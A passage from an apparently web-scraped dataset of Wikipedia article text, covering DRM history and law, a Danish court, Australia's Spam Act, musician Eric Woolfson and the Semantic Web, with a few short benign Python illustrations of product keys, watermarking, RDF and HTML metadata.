DRM in late 2008, with the release of Prince of Persia as an experiment to "see how truthful people really are" regarding the claim that DRM was inciting people to use illegal copies. 55 Although Ubisoft has not commented on the results of the "experiment", Tweakguides noted that two torrents on Mininova had over 23,000 people downloading the game within 24 hours of its release. 
56 In 2009, Amazon remotely deleted purchased copies of George Orwell's Animal Farm (1945) and Nineteen Eighty-Four (1949) from customers' Amazon Kindles after refunding the purchase price. 57 Commentators described these actions as Orwellian and compared Amazon to Big Brother from Nineteen Eighty-Four. 58 59 60 61 Amazon CEO Jeff Bezos then issued a public apology. FSF wrote that this was an example of the excessive power Amazon has to remotely censor content, and called upon Amazon to drop DRM. 62 Amazon then revealed the reason behind its deletion: the e-books in question were unauthorized reproductions of Orwell's works, which were not within the public domain and that the company that published and sold on Amazon's service had no right to do so. 63 Ubisoft formally announced a return to online authentication on 9 February 2010, through its Uplay online game platform, starting with Silent Hunter 5, The Settlers 7, and Assassin's Creed II. 64 Silent Hunter 5 was first reported to have been compromised within 24 hours of release, 65 but users of the cracked version soon found out that only early parts of the game were playable. 66 The Uplay system works by having the installed game on the local PCs incomplete and then continuously downloading parts of the game code from Ubisoft's servers as the game progresses. 67 It was more than a month after the PC release in the first week of April that software was released that could bypass Ubisoft's DRM in Assassin's Creed II. The software did this by emulating a Ubisoft server for the game. Later that month, a real crack was released that was able to remove the connection requirement altogether. 68 69 In March 2010, Uplay servers suffered a period of inaccessibility due to a large-scale DDoS attack, causing around 5% of game owners to become locked out of playing their game. 70 The company later credited owners of the affected games with a free download, and there has been no further downtime. 71 In 2011, comedian Louis C.K. released his concert film Live at the Beacon Theater as an inexpensive (US$5), DRM-free download. The only attempt to deter unlicensed copies was a letter emphasizing the lack of corporate involvement and direct relationship between artist and viewer. The film was a commercial success, turning a profit within 12 hours of its release. The artist suggested that piracy rates were lower than normal as a result, making the release an important case study for the digital marketplace. 72 73 74 In 2012, the EU Court of Justice ruled in favor of reselling copyrighted games. 75 In 2012, India implemented digital rights management protection. 76 77 78 79 In 2012, webcomic Diesel Sweeties released a DRM-free PDF e-book. 80 81 82 He followed this with a DRM-free iBook specifically for the iPad 83 that generated more than 10,000 downloads in three days. 84 That led Stevens to launch a Kickstarter project "ebook stravaganza 3000" to fund the conversion of 3,000 comics, written over 12 years, into a single "humongous" e-book to be released both for free and through the iBookstore; launched 8 February 2012, with the goal of raising $3,000 in 30 days. The "payment optional" DRM-free model in this case was adopted on Stevens' view that "there is a class of webcomics reader who would prefer to read in large chunks and, even better, would be willing to spend a little money on it. 84 In February 2012, Double Fine asked for crowdfunding for an upcoming video game, Double Fine Adventure, on Kickstarter and offered the game DRM-free for backers. 
This project exceeded its original goal of $400,000 in 45 days, raising in excess of $2 million. 85 Crowdfunding acted as a pre-order or alternatively as a subscription. After the success of Double Fine Adventure, many games were crowd-funded and many offered a DRM-free version. 86 87 88 Websites such as library.nu (shut down by court order on 15 February 2012), BookFi, BookFinder, Library Genesis, and Sci-Hub allowed e-book downloading by violating copyright. 89 90 91 92 As of 2013, other developers, such as Blizzard Entertainment put most of the game logic is on the "side" or taken care of by the servers of the game maker. Blizzard uses this strategy for its game Diablo III and Electronic Arts used this same strategy with their reboot of SimCity, the necessity of which has been questioned. 93 In 2014, the EU Court of Justice ruled that circumventing DRM on game devices was legal under some circumstances. 94 95 In 2014, digital comic distributor Comixology allowed rights holders to provide the option of DRM-free downloads. Publishers that allow this include Dynamite Entertainment, Image Comics, Thrillbent, Top Shelf Productions, and Zenescope Entertainment. 96 In February 2022, Comixology, which was later under the ownership of Amazon, ended the option of downloading DRM-free downloads on all comics, although any comics previously purchased prior to the date will have the option to download comics without DRM. 97 98 A product key, typically an alphanumerical string, can represent a license to a particular copy of software. During the installation process or software launch, the user is asked to enter the key; if the key is valid (typically via internal algorithms), the key is accepted, and the user can continue. Product keys can be combined with other DRM practices (such as online "activation"), to prevent cracking the software to run without a product key, or using a keygen to generate acceptable keys. DRM can limit the number of devices on which a legal user can install content. This restriction typically support 3 5 devices. This affects users who have more devices than the limit. Some allow one device to be replaced with another. Without this software and hardware upgrades may require an additional purchase. Always-on DRM checks and rechecks authorization while the content is in use by interacting with a server operated by the copyright holder. In some cases, only part of the content is actually installed, while the rest is downloaded dynamically during use. Encryption alters content in a way that means that it cannot be used without first decrypting it. Encryption can ensure that other restriction measures cannot be bypassed by modifying software, so DRM systems typically rely on encryption in addition to other techniques. Microsoft PlayReady prevents illicit copying of multimedia and other files. 99 Restrictions can be applied to electronic books and documents, in order to prevent copying, printing, forwarding, and creating backup copies. This is common for both e-publishers and enterprise Information Rights Management. It typically integrates with content management system software. 100 While some commentators claim that DRM complicates e-book publishing, 101 it has been used by organizations such as the British Library in its secure electronic delivery service to permit worldwide access to rare documents which, for legal reasons, were previously only available to authorized individuals actually visiting the Library's document centre. 
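As a purely hypothetical illustration of the product-key idea described above, a key can carry a checksum that an installer verifies offline; real schemes rely on cryptographic signatures and online activation, not anything this simple.

def make_key(serial: int) -> str:
    # Toy scheme: a 6-digit serial plus a 2-digit checksum. Not a real DRM scheme.
    checksum = sum(int(d) for d in f"{serial:06d}") % 97
    return f"{serial:06d}-{checksum:02d}"

def is_valid_key(key: str) -> bool:
    # Accept the key only if the checksum matches the serial's digit sum.
    try:
        serial, checksum = key.split("-")
        return int(checksum) == sum(int(d) for d in serial) % 97
    except ValueError:
        return False

key = make_key(123456)
print(key, is_valid_key(key), is_valid_key("123456-00"))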
102 103 104 Four main e-book DRM schemes are in common use, from Adobe, Amazon, Apple, and the Marlin Trust Management Organization (MTMO). Windows Vista contains a DRM system called Protected Media Path, which contains Protected Video Path (PVP). 106 PVP tries to stop DRM-restricted content from playing while unsigned software is running, in order to prevent the unsigned software from accessing the content. Additionally, PVP can encrypt information during transmission to the monitor or the graphics card, which makes it more difficult to make unauthorized recordings. Bohemia Interactive have used a form of technology since Operation Flashpoint: Cold War Crisis, wherein if the game copy is suspected of being unauthorized, annoyances like guns losing their accuracy or the players turning into a bird are introduced. 107 Croteam's Serious Sam 3: BFE causes a special invincible foe in the game to appear and constantly attack the player until they are killed. 108 109 Regional lockout (or region coding) prevents the use of a certain product or service, except in a specific region or territory. Lockout may be enforced through physical means, through technological means such as inspecting the user's IP address or using an identifying code, or through unintentional means introduced by devices that support only region-specific technologies (such as video formats, i.e., NTSC and PAL). Digital watermarks can be steganographically embedded within audio or video data. They can be used for recording the copyright owner, the distribution chain or identifying the purchaser. They are not complete DRM mechanisms in their own right, but are used as part of a system for copyright enforcement, such as helping provide evidence for legal purposes, rather than enforcing restrictions. 110 Some audio video editing programs may distort, delete, or otherwise interfere with watermarks. Signal modulator-carrier chromatography may separate watermarks from the recording or detect them as glitches. Additionally, comparison of two separately obtained copies of audio using basic algorithms can reveal watermarks. citation needed Sometimes, metadata is included in purchased media which records information such as the purchaser's name, account information, or email address. Also included may be the file's publisher, author, creation date, download date, and various notes. This information is not embedded in the content, as a watermark is. It is kept separate from the content, but within the file or stream. As an example, metadata is used in media purchased from iTunes for DRM-free as well as DRM-restricted content. This information is included as MPEG standard metadata. 111 112 US Cable television set-top boxes require a specific piece of hardware to operate. The CableCard standard is used to restrict content to services to which the customer is subscribed. Content has an embedded broadcast flag that the card examines to decide whether the content can be viewed by a specific user. In addition, platforms such as Steam may include DRM mechanisms. Most of the mechanisms above are copy protection mechanisms rather than DRM mechanisms per se. The World Intellectual Property Organization supports the World Intellectual Property Organization Copyright Treaty (WCT) which requires nations to enact laws against DRM circumvention. The WIPO Internet Treaties do not mandate criminal sanctions, merely requiring "effective legal remedies". 113 China's Interim Regulations ostensibly regulate digital content. 
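To make the watermarking idea above concrete, here is a toy least-significant-bit embed and extract over a list of integer audio samples. It only sketches the general steganographic idea; production watermarks are designed to survive compression, resampling and editing, which this does not.

def embed_watermark(samples, bits):
    # Overwrite the least significant bit of the first len(bits) samples
    # with the watermark bits (0 or 1). Assumes non-negative integer samples.
    marked = list(samples)
    for i, bit in enumerate(bits):
        marked[i] = (marked[i] & ~1) | bit
    return marked

def extract_watermark(samples, n_bits):
    # Read the watermark back out of the least significant bits.
    return [s & 1 for s in samples[:n_bits]]

audio = [1000, 1001, 998, 997, 1002, 1003]
mark = [1, 0, 1, 1]
stamped = embed_watermark(audio, mark)
print(stamped, extract_watermark(stamped, len(mark)))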
China claims to protect intellectual property rights, although the World Trade Organization (WTO) "determined that China's copyright laws do not provide the same efficacy to non-Chinese nationals as they do to Chinese citizens, as required by the Berne Convention" and that "China's copyright laws do not provide enforcement procedures so as to permit effective action against any act of infringement of intellectual property rights". 114 The EU operates under its Information Society Directive, its WIPO implementation. The European Parliament then directed member states to outlaw violation of international copyright for commercial purposes. Punishments range from fines to imprisonment. It excluded patent rights and copying for personal, non-commercial purposes. Copyrighted games can be resold. 75 Circumventing DRM on game devices is legal under some circumstances; protections cover only technological measures the interfere with prohibited actions. 94 95 India is not a signatory to WIPO Copyright Treaty or the WIPO Performances and Phonograms Treaty. 115 Its Copyright Act provides protections for digital content, criminalizing circumvention of technical protections and distribution of illicit copies. Punishment includes prison time. Fair use is not explicitly addressed. 76 77 78 Israel is not a signatory to the WIPO Copyright Treaty. Israeli law does not expressly prohibit the circumvention of technological protection measures. 116 Pakistan is not a signatory to the WIPO Copyright Treaty or the WIPO Performances and Phonograms Treaty. Pakistani law does not criminalize the circumvention of technological protection measures. 117 As of January 2022, Pakistan's Intellectual Property Office intended to accede to the WIPO Copyright Treaty and WIPO Performances and Phonograms Treaty. However, there has been no major progress for Pakistan to accede to the treaties, 118 and the timeline of the enactments of amendments to the Copyright Ordinance is unclear. 119 As of February 2023, Pakistan's Intellectual Property Office was currently finalizing draft amendments to its Copyright Ordinance. 120 US protections are governed by the Digital Millennium Copyright Act (DMCA). It criminalizes the production and dissemination of technology that lets users circumvent copy-restrictions. Reverse engineering is expressly permitted, providing a safe harbor where circumvention is necessary to interoperate with other software. Open-source software that decrypts protected content is not prohibited per se. Decryption done for the purpose of achieving interoperability of open source operating systems with proprietary systems is protected. Dissemination of such software for the purpose of violating or encouraging others to violate copyrights is prohibited. DMCA has been largely ineffective. 121 Cirumvention software is widely available. However, those who wish to preserve the DRM systems have attempted to use the Act to restrict the distribution and development of such software, as in the case of DeCSS. DMCA contains an exception for research, although the exception is subject to qualifiers that created uncertainty in that community. Cryptanalytic research may violate the DMCA, although this is unresolved. DRM faces widespread opposition. John Walker 122 and Richard Stallman are notable critics. 123 124 Stallman has claimed that using the word "rights" is misleading and suggests that the word "restrictions", as in "Digital Restrictions Management", replace it. 
125 This terminology has been adopted by other writers and critics. 126 127 128 Other prominent critics include Ross Anderson, who heads a British organization that opposes DRM and similar efforts in the UK and elsewhere, and Cory Doctorow. 129 EFF and organizations such as FreeCulture.org are opposed to DRM. 130 The Foundation for a Free Information Infrastructure criticized DRM's effect as a trade barrier from a free market perspective. 131 Bruce Schneier argues that digital copy prevention is futile: "What the entertainment industry is trying to do is to use technology to contradict that natural law. They want a practical way to make copying hard enough to save their existing business. But they are doomed to fail. 132 He described trying to make digital files uncopyable as like "trying to make water not wet". 133 The creators of StarForce stated that "The purpose of copy protection is not making the game uncrackable it is impossible. 134 Bill Gates spoke about DRM at 2006 CES, saying that DRM causes problems for legitimate consumers. 135 The Norwegian consumer rights organization "Forbrukerr det" complained to Apple in 2007 about the company's use of DRM, accusing it of unlawfully restricting users' access to their music and videos, and of using EULAs that conflict with Norwegian consumer legislation. The complaint was supported by consumers' ombudsmen in Sweden and Denmark, and was reviewed in the EU in 2014. The United States Federal Trade Commission held hearings in March 2009, to review disclosure of DRM limitations to customers' use of media products. 136 Valve president Gabe Newell stated, "most DRM strategies are just dumb" because they only decrease the value of a game in the consumer's eyes. Newell suggested that the goal should instead be creating greater value for customers through service value". Valve operates Steam, an online store for PC games, as well as a social networking service and a DRM platform. 137 At the 2012 Game Developers Conference, the CEO of CD Projekt Red, Marcin Iwinski, announced that the company would not use DRM. Iwinski stated of DRM, "It's just over-complicating things... the game... is cracked in two hours. Iwinski added "DRM does not protect your game. If there are examples that it does, then people maybe should consider it, but then there are complications with legit users. 138 The Association for Computing Machinery and the Institute of Electrical and Electronics Engineers opposed DRM, naming AACS as a technology "most likely to fail" in an issue of IEEE Spectrum. 139 The GNU General Public License version 3, as released by the Free Software Foundation, has a provision that "strips" DRM of its legal value, so people can break the DRM on GPL software without breaking laws such as the DMCA. In May 2006, FSF launched a "Defective by Design" campaign against DRM. 140 141 Creative Commons provides licensing options that encourage creators to work without the use of DRM. 142 Creative Commons licenses have anti-DRM clauses, making the use of DRM by a licensee a breach of the licenses' Baseline Rights. 143 Many publishers and artists label their works "DRM-free". Major companies that have done so include Apple, GOG.com, Tor Books and Vimeo on Demand. Comixology once had DRM-free works available for sale until 2022 when its parent company, Amazon, removed the option to buy DRM-free works as part of their migration to Amazon's website, although previous purchases remained DRM-free. 144 Many DRM systems require online authentication. 
Whenever the server goes down, or a territory experiences an Internet outage, it locks out people from registering or using the material. 145 This is especially true for products that require a persistent online connection, where, for example, a successful DDoS attack on the server essentially makes the material unusable. Compact discs (CDs) with DRM schemes are not standards-compliant, and are labeled CD-ROMs. CD-ROMs cannot be played on all CD players or personal computers. 146 Certain DRM systems have been associated with reduced performance: some games implementing Denuvo Anti-Tamper performed better without DRM. 147 148 However, in March 2018, PC Gamer tested Final Fantasy XV for the performance effects of Denuvo, which was found to cause no negative gameplay impact despite a little increase in loading time. 149 DRM copy-prevention schemes can never be wholly secure since the logic needed to decrypt the content is present either in software or hardware and implicitly can be hacked. An attacker can extract this information, decrypt and copy the content, bypassing the DRM. 129 Satellite and cable systems distribute their content widely and rely on hardware DRM systems. Such systems can be hacked by reverse engineering the protection scheme. Audio and visual material (excluding interactive materials, e.g., video games) are subject to the analog hole, namely that in order to view the material, the digital signal must be turned into an analog signal. Post-conversion, the material can be then be copied and reconverted to a digital format. The analog hole cannot be filled without externally imposed restrictions, such as legal regulations, because the vulnerability is inherent to all analog presentation. 150 The conversion from digital to analog and back reduces recording quality. The HDCP attempt to plug the analog hole was largely ineffective. 151 152 DRM opponents argue that it violates private property rights and restricts a range of normal and legal user activities. A DRM component such as that found on a digital audio player restricts how it acts with regard to certain content, overriding user's wishes (for example, preventing the user from copying a copyrighted song to CD as part of a compilation). Doctorow described this as "the right to make up your own copyright laws". 153 Windows Vista disabled or degraded content play that used a Protected Media Path. 154 DRM restricts the right to make personal copies, provisions lend copies to friends, provisions for service discontinuance, hardware agnosticism, software and operating system agnosticism, 155 lending library use, customer protections against contract amendments by the publisher, and whether content can pass to the owner's heirs. 156 When standards and formats change, DRM-restricted content may become obsolete. When a company undergoes business changes or bankruptcy, its previous services may become unavailable. Examples include MSN Music, 157 Yahoo Music Store, 158 Adobe Content Server 3 for Adobe PDF, 159 and Acetrax Video on Demand. 160 DRM laws are widely flouted: according to Australia Official Music Chart Survey, copyright infringements from all causes are practised by millions of people. 161 According to the EFF, "in an effort to attract customers, these music services try to obscure the restrictions they impose on you with clever marketing. 162 Jeff Raikes, ex-president of the Microsoft Business Division, stated: "If they're going to pirate somebody, we want it to be us rather than somebody else". 
163 An analogous argument was made in an early paper by Kathleen Conner and Richard Rummelt. 164 A subsequent study of digital rights management for e-books by Gal Oestreicher-Singer and Arun Sundararajan showed that relaxing some forms of DRM can be beneficial to rights holders because the losses from piracy are outweighed by the increase in value to legal buyers. Even if DRM were unbreakable, pirates still might not be willing to purchase, so sales might not increase. 165 Piracy can be beneficial to some content providers by increase consumer awareness, spreading and popularizing content. This can also increase revenues via other media, such as live performances. Mathematical models suggest that DRM schemes can fail to do their job on multiple levels. 166 The biggest failure is that the burden that DRM poses on a legitimate customer reduces the customer's willingness to buy. An ideal DRM would not inconvenience legal buyers. The mathematical models are strictly applicable to the music industry. Several business models offer DRM alternatives. 167 Streaming services have created profitable business models by signing users to monthly subscriptions in return for access to the service's library. This model has worked for music (such as Spotify, Apple Music, etc.) and video (such as Netflix, Disney , Hulu, etc.). Accessing a pirated copy can be illegal and inconvenient. Businesses that charge acceptable fees for doing so tend to attract customers. A business model that dissuades illegal file sharing is to make legal content downloading easy and cheap. Pirate websites often host malware which attaches itself to the files served. 168 If content is provided on legitimate sites and is reasonably priced, consumers are more likely to purchase media legally. 167 Crowdfunding has been used as a publishing model for digital content. 85 Many artists give away individual tracks to create awareness for a subsequent album. 167 The Artistic Freedom Voucher (AFV) introduced by Dean Baker is a way for consumers to support "creative and artistic work". In this system, each consumer receives a refundable tax credit of $100 to give to any artist of creative work. To restrict fraud, the artists must register with the government. The voucher prohibits any artist that receives the benefits from copyrighting their material for a certain length of time. Consumers would be allowed to obtain music for a certain amount of time easily and the consumer would decide which artists receive the $100. The money can either be given to one artist or to many, and this distribution is up to the consumer. 169 |
20 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Maritime_and_Commercial_Court_(Denmark) | The Maritime and Commercial Court (Danish: Sø- og Handelsretten) is a specialized Danish court with jurisdiction over cases involving commercial law and maritime law. It was founded in 1861. 1 It has a civil division, focusing on business cases, and a bankruptcy division. 2 |
21 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Spam_Act_2003 | The Spam Act 2003 (Cth) is an Act passed by the Australian Parliament in 2003 to regulate commercial e-mail and other types of commercial electronic messages. The Act restricts spam, especially e-mail spam and some types of phone spam, as well as e-mail address harvesting. However, there are broad exemptions. 1 The first portions of the Act came into effect on 12 December 2003, the day the act received Royal Assent, with the remaining sections of the Act coming into force on 10 April 2004. The Act was originally enforced by the Australian Communications Authority, which in 2005 merged into the Australian Communications and Media Authority (ACMA). The key points of the Act provide that: 2 In ACA v Clarity1 (2006), 3 Justice Robert Nicholson considered the respondent's key defence, being retrospective application of provisions under the Act relating to the acquisition and use of harvested address lists. He noted specifically that lists gathered or acquired prior to the Act coming into force are still subject to the legislation. He also struck out the respondent's defence that it had obtained consent to use the gathered addresses for the defined purpose, and also noted a lack of compliance with the provisions of the Act requiring the provision of a functional unsubscribe facility. |
22 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Special:Random | Eric Norman Woolfson (18 March 1945 2 December 2009) 1 was a Scottish songwriter, lyricist, vocalist, executive producer, pianist, and co-creator of the band the Alan Parsons Project, who sold over 50 million albums worldwide. Woolfson also pursued a career in musical theatre. Woolfson was born into a Jewish family in the Charing Cross area of Glasgow, where his family owned the Elders furniture store. He was raised in the Pollokshields area on the south side of the city and educated at the High School of Glasgow. Woolfson's interest in music was inspired by an uncle and he taught himself to play the piano. 2 After leaving school, he briefly flirted with becoming an accountant before moving to London to seek opportunities in the music industry. Arriving in London in 1963, he found work as a session pianist. The then current record producer for the Rolling Stones, Andrew Loog Oldham, signed him as a songwriter. During the following years, Woolfson wrote songs for artists such as Marianne Faithfull, Frank Ifield, Joe Dassin, the Tremeloes, Marie (French singer), Marmalade, Dave Berry, Peter Noone, and the Poets. In due course Woolfson signed other publishing deals as more of his songs were adopted by leading recording artists, throughout Europe and America. He also signed a deal with Southern Music, where he worked alongside composers and lyricists such as Andrew Lloyd Webber and Tim Rice. 3 In 1971, with the assistance of Eric Stewart, Kevin Godley, Lol Creme and Graham Gouldman (who later became 10cc), a single was produced under the name of Eric Elder ("San Tokay" b w "Sunflower") and issued on UK Philips 6006 081 and US Philips 40699. Woolfson then produced a single by Graham Gouldman ("Nowhere to Go" b w "Growing Older") which was issued in 1972 on UK CBS 7739. In the late 1960s and early 1970s, Woolfson was an independent record producer for several record companies, and worked with artists including Dave Berry, the Equals, the Tremeloes and, in 1973, Darren Burn. Despite his success, he found that earning a living as a songwriter was not easy and decided to try artist management. His move into management was instantly successful. His first two signings were Carl Douglas (whose record "Kung Fu Fighting" (1974) was one of the biggest selling hits of all time) and engineer record producer Alan Parsons. In 1974, Woolfson met record producer Alan Parsons at the Abbey Road Studios in London where both were working on different projects. Parsons asked Woolfson to become his manager and they worked together with a number of bands and artists including Pilot, Cockney Rebel, John Miles, Al Stewart, Ambrosia and the Hollies. Subsequently, Woolfson and Parsons formed the Alan Parsons Project, the name originally being intended as a working title for their collaborative project. From 1976 to 1987, Woolfson and Parsons collaborated on the conception and lyrics for all ten albums by the Alan Parsons Project, which have achieved worldwide album sales in excess of 50 million. On every Project album, Woolfson would sing a guide vocal track for each song, which the album's eventual lead vocalists would use as a reference. Some of these tracks can be heard on the new remastered editions of various Project albums released in 2007. 
Woolfson himself was the actual singer on many of the Project's biggest hits such as "Time", "Don't Answer Me", "Prime Time" and the band's signature tune "Eye in the Sky", which peaked at No. 3 on the Billboard Hot 100 on 16 30 October 1982. Freudiana was originally meant to be the 11th album by the Alan Parsons Project, but Woolfson was keen to explore the possibility of realising the project as a musical. While recording the album, Brian Brolly was introduced to Woolfson and promised to steer the album in this new direction. Brolly was previously a partner with Andrew Lloyd Webber, and together they created such musicals as Cats. With some help from Brolly, Woolfson was able to turn Freudiana into a stage musical. Before the Freudiana stage production opened in 1990 in Vienna, a double-length studio album was released. The musical had a successful run, and it was planned that the show would open in other cities. However, plans were put on hold when a lawsuit broke out between Brolly and Woolfson, each fighting for control of the project. The studio disc (the "white" album) was quite difficult to obtain for a while. There was also a double-length German-language cast disc (the "black" album) which is currently out of print. Woolfson explained his career switch during an interview in 2004: I eventually developed The Alan Parsons Project as a vehicle but then I realised that there was more to it than that and that Andrew Lloyd Webber was right and that the stage musical was a fulfilling media for a writer like myself. I got into stage musicals in the mid 1980s. 4 His first three musicals were Freudiana (1990), about Sigmund Freud; Gaudi (1993), 5 about Antonio Gaudi, and Gambler (1996). A fourth musical Edgar Allan POE, based on the life of the author, was given a world premiere concert production at Abbey Road studios, London in 2003. 6 An album was released in 2003 as Poe: More Tales of Mystery and Imagination (this contains some but not all of the songs from the stage version), and a musical album CD Edgar Allan Poe (containing the complete musical score of 17 songs) and a DVD of the POE Abbey Road concert were released in 2009. 7 Dancing with Shadows (inspired by the anti-war play Forest Fire by the Korean playwright Cham Bum-Suk and with a book by Ariel Dorfman) was premiered in July 2007 in Korea. 8 Woolfson married his wife Hazel in 1969 and they had two daughters and four grandchildren. 9 Politically, he was a centrist, supporting the Social Democratic Party (SDP) throughout the 1980s. 3 A friend of the SDP's second leader, David Owen, Woolfson refused to back the party's merger with the Liberal Party in 1988 and instead followed Owen into the 'continuing' SDP, of which he was a trustee (alongside David Sainsbury and Sir Leslie Murphy) until it was dissolved in 1990. 3 10 Woolfson died from kidney cancer in London on 2 December 2009. He was survived by his wife, daughters Sally Seddon and Lorna Covington and four grandchildren. 11 He is buried in Cathcart Cemetery near Glasgow. |
23 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Semantic_web | The Semantic Web, sometimes known as Web 3.0 (not to be confused with Web3), is an extension of the World Wide Web through standards 1 set by the World Wide Web Consortium (W3C). The goal of the Semantic Web is to make Internet data machine-readable. To enable the encoding of semantics with the data, technologies such as Resource Description Framework (RDF) 2 and Web Ontology Language (OWL) 3 are used. These technologies are used to formally represent metadata. For example, ontology can describe concepts, relationships between entities, and categories of things. These embedded semantics offer significant advantages such as reasoning over data and operating with heterogeneous data sources. 4 These standards promote common data formats and exchange protocols on the Web, fundamentally the RDF. According to the W3C, "The Semantic Web provides a common framework that allows data to be shared and reused across application, enterprise, and community boundaries. 5 The Semantic Web is therefore regarded as an integrator across different content and information applications and systems. The term was coined by Tim Berners-Lee for a web of data (or data web) 6 that can be processed by machines 7 —that is, one in which much of the meaning is machine-readable. While its critics have questioned its feasibility, proponents argue that applications in library and information science, industry, biology and human sciences research have already proven the validity of the original concept. 8 Berners-Lee originally expressed his vision of the Semantic Web in 1999 as follows: I have a dream for the Web in which computers become capable of analyzing all the data on the Web the content, links, and transactions between people and computers. A "Semantic Web", which makes this possible, has yet to emerge, but when it does, the day-to-day mechanisms of trade, bureaucracy and our daily lives will be handled by machines talking to machines. The "intelligent agents" people have touted for ages will finally materialize. 9 The 2001 Scientific American article by Berners-Lee, Hendler, and Lassila described an expected evolution of the existing Web to a Semantic Web. 10 In 2006, Berners-Lee and colleagues stated that: "This simple idea…remains largely unrealized". 11 In 2013, more than four million Web domains (out of roughly 250 million total) contained Semantic Web markup. 12 In the following example, the text "Paul Schuster was born in Dresden" on a website will be annotated, connecting a person with their place of birth. The following HTML fragment shows how a small graph is being described, in RDFa-syntax using a schema.org vocabulary and a Wikidata ID: The example defines the following five triples (shown in Turtle syntax). Each triple represents one edge in the resulting graph: the first element of the triple (the subject) is the name of the node where the edge starts, the second element (the predicate) the type of the edge, and the last and third element (the object) either the name of the node where the edge ends or a literal value (e.g. a text, a number, etc.). The triples result in the graph shown in the given figure. One of the advantages of using Uniform Resource Identifiers (URIs) is that they can be dereferenced using the HTTP protocol. According to the so-called Linked Open Data principles, such a dereferenced URI should result in a document that offers further data about the given URI. 
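The RDFa fragment referred to in this passage did not survive the text extraction, but the graph it describes can be rebuilt with the rdflib library (not among the packages installed at the top of this notebook; pip install rdflib). The subject URI below is a placeholder, and exactly which five triples the original example lists is an assumption based on the surrounding description (a Person named Paul Schuster whose birthPlace is Wikidata item Q1731, Dresden), so read this as a sketch of the graph rather than a copy of the article's markup.

from rdflib import Graph, Literal, Namespace, URIRef
from rdflib.namespace import RDF

SCHEMA = Namespace("http://schema.org/")
WD = Namespace("http://www.wikidata.org/entity/")

g = Graph()
g.bind("schema", SCHEMA)

paul = URIRef("http://example.org/Paul_Schuster")  # placeholder subject URI
g.add((paul, RDF.type, SCHEMA.Person))
g.add((paul, SCHEMA.name, Literal("Paul Schuster")))
g.add((paul, SCHEMA.birthPlace, WD.Q1731))
g.add((WD.Q1731, RDF.type, SCHEMA.Place))
g.add((WD.Q1731, SCHEMA.name, Literal("Dresden")))

print(g.serialize(format="turtle"))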
In this example, all URIs, both for edges and nodes (e.g. http: schema.org Person, http: schema.org birthPlace, http: www.wikidata.org entity Q1731) can be dereferenced and will result in further RDF graphs, describing the URI, e.g. that Dresden is a city in Germany, or that a person, in the sense of that URI, can be fictional. The second graph shows the previous example, but now enriched with a few of the triples from the documents that result from dereferencing https: schema.org Person (green edge) and https: www.wikidata.org entity Q1731 (blue edges). Additionally to the edges given in the involved documents explicitly, edges can be automatically inferred: the triple from the original RDFa fragment and the triple from the document at https: schema.org Person (green edge in the figure) allow to infer the following triple, given OWL semantics (red dashed line in the second Figure): The concept of the semantic network model was formed in the early 1960s by researchers such as the cognitive scientist Allan M. Collins, linguist Ross Quillian and psychologist Elizabeth F. Loftus as a form to represent semantically structured knowledge. When applied in the context of the modern internet, it extends the network of hyperlinked human-readable web pages by inserting machine-readable metadata about pages and how they are related to each other. This enables automated agents to access the Web more intelligently and perform more tasks on behalf of users. The term "Semantic Web" was coined by Tim Berners-Lee, 7 the inventor of the World Wide Web and director of the World Wide Web Consortium ("W3C"), which oversees the development of proposed Semantic Web standards. He defines the Semantic Web as "a web of data that can be processed directly and indirectly by machines". Many of the technologies proposed by the W3C already existed before they were positioned under the W3C umbrella. These are used in various contexts, particularly those dealing with information that encompasses a limited and defined domain, and where sharing data is a common necessity, such as scientific research or data exchange among businesses. In addition, other technologies with similar goals have emerged, such as microformats. Many files on a typical computer can also be loosely divided into human-readable documents and machine-readable data. Documents like mail messages, reports, and brochures are read by humans. Data, such as calendars, address books, playlists, and spreadsheets are presented using an application program that lets them be viewed, searched, and combined. Currently, the World Wide Web is based mainly on documents written in Hypertext Markup Language (HTML), a markup convention that is used for coding a body of text interspersed with multimedia objects such as images and interactive forms. Metadata tags provide a method by which computers can categorize the content of web pages. In the examples below, the field names "keywords", "description" and "author" are assigned values such as "computing", and "cheap widgets for sale" and "John Doe". Because of this metadata tagging and categorization, other computer systems that want to access and share this data can easily identify the relevant values. With HTML and a tool to render it (perhaps web browser software, perhaps another user agent), one can create and present a page that lists items for sale. 
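The meta-tag example referred to a little earlier ("keywords", "description", "author") was lost in extraction, but the idea is easy to demonstrate with the parser this notebook already uses. The HTML snippet below is a reconstruction in that spirit, not the article's original markup.

from bs4 import BeautifulSoup

html = """
<head>
  <meta name="keywords" content="computing, widgets">
  <meta name="description" content="cheap widgets for sale">
  <meta name="author" content="John Doe">
</head>
"""

soup = BeautifulSoup(html, "html5lib")
metadata = {tag["name"]: tag["content"]
            for tag in soup.find_all("meta", attrs={"name": True, "content": True})}
print(metadata)  # {'keywords': 'computing, widgets', 'description': 'cheap widgets for sale', 'author': 'John Doe'}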
The HTML of this catalog page can make simple, document-level assertions such as "this document's title is 'Widget Superstore' , but there is no capability within the HTML itself to assert unambiguously that, for example, item number X586172 is an Acme Gizmo with a retail price of 199, or that it is a consumer product. Rather, HTML can only say that the span of text "X586172" is something that should be positioned near "Acme Gizmo" and 199", etc. There is no way to say "this is a catalog" or even to establish that "Acme Gizmo" is a kind of title or that 199" is a price. There is also no way to express that these pieces of information are bound together in describing a discrete item, distinct from other items perhaps listed on the page. Semantic HTML refers to the traditional HTML practice of markup following intention, rather than specifying layout details directly. For example, the use of em denoting "emphasis" rather than i , which specifies italics. Layout details are left up to the browser, in combination with Cascading Style Sheets. But this practice falls short of specifying the semantics of objects such as items for sale or prices. Microformats extend HTML syntax to create machine-readable semantic markup about objects including people, organizations, events and products. 13 Similar initiatives include RDFa, Microdata and Schema.org. The Semantic Web takes the solution further. It involves publishing in languages specifically designed for data: Resource Description Framework (RDF), Web Ontology Language (OWL), and Extensible Markup Language (XML). HTML describes documents and the links between them. RDF, OWL, and XML, by contrast, can describe arbitrary things such as people, meetings, or airplane parts. These technologies are combined in order to provide descriptions that supplement or replace the content of Web documents. Thus, content may manifest itself as descriptive data stored in Web-accessible databases, 14 or as markup within documents (particularly, in Extensible HTML (XHTML) interspersed with XML, or, more often, purely in XML, with layout or rendering cues stored separately). The machine-readable descriptions enable content managers to add meaning to the content, i.e., to describe the 